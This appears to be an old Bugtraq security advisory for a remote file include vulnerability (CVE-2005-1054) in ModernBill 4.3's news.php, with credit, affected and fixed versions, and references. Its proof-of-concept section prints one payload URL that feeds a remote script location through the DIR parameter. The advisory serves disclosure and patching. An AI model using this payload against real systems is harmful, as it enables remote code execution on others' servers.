BID:13086

ModernGigabyte ModernBill News.PHP File Include Vulnerability

Info

ModernGigabyte ModernBill News.PHP File Include Vulnerability

Bugtraq ID:	13086
Class:	Input Validation Error
CVE:	CVE-2005-1054
Remote:	Yes
Local:	No
Published:	Apr 10 2005 12:00AM
Updated:	Jul 12 2009 12:56PM
Credit:	Discovery is credited to James Bercegay of the GulfTech Security Research Team.
Vulnerable:	ModernGigabyte ModernBill 4.3

Not Vulnerable:	ModernGigabyte ModernBill 4.3.1

Discussion

ModernGigabyte ModernBill News.PHP File Include Vulnerability

ModernBill is prone to a remote file include vulnerability.

The problem presents itself specifically when an attacker passes the location of a remote attacker-specified script through the 'news.php' script.

ModernBill 4.3 and prior versions are vulnerable to this issue.

Exploit / POC

ModernGigabyte ModernBill News.PHP File Include Vulnerability

An exploit is not required.

Proof of concept example is available:
http://www.example.com/samples/news.php?DIR=http://www.example.com/

Solution / Fix

ModernGigabyte ModernBill News.PHP File Include Vulnerability

Solution:
The vendor has released ModernBill version 4.3.1 to address this issue. Please contact the vendor to obtain the fixed packages.

References

ModernGigabyte ModernBill News.PHP File Include Vulnerability

References:

ModernBill (ModernGigabyte)
Multiple ModernBill 4.3.0 And Earlier Vulnerabilities (James Bercegay)
Multiple ModernBill 4.3.0 And Earlier Vulnerabilities (GulfTech Security Research )